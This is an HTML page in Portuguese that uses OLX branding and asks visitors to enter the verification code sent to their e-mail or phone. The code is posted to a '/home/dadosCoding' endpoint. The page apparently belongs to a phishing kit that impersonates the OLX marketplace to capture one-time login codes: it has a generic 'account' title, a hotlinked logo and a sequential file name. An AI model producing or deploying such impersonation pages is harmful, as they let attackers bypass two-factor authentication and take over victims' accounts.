<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/styles/stylepag3.css">
    <title>account</title>
</head>
<body>
    <header>
        <div>
            <img src="https://logopng.com.br/logos/olx-104.svg" alt="olx">
        </div>
    </header>
    <div  class="divLinha">
        <!--conteiner  linha -->
    </div>
    <main>
        <form action="/home/dadosCoding" method="post">
            <div class="divH1">
                <h3>Código de Verificação</h3>
            </div>
            <div>
                <div>
                    <p>insira o Codigo recebido no seu e-mail ou telefone<br> cadastrado na sua conta</p>
                </div>
            </div>
            <div class="divInput">
                <div>
                    <div class="inputPAss">
                        <input name="coding" class="codigo" type="number">
                    </div>
                </div>
            </div>
            <div>
                <button type="submit" class="btn">Confirma codigo</button>
            </div>
        
            <hr class="hrFooter">
            <div class="divfooter">
                <p>Ao continuar , voce concorda com os <a href="#">Termos de Uso</a> e a </p>
                <p><a href="#">Politica de privacidade</a> da OLX e seus parceiros, e em receber<br>cominicacoes da OLX</p>
            </div>
            <br>
        </form>
    </main>
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
    <script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
    <script type="module" src="/frontend/javascript/pag3.js"></script>
</body>
</html>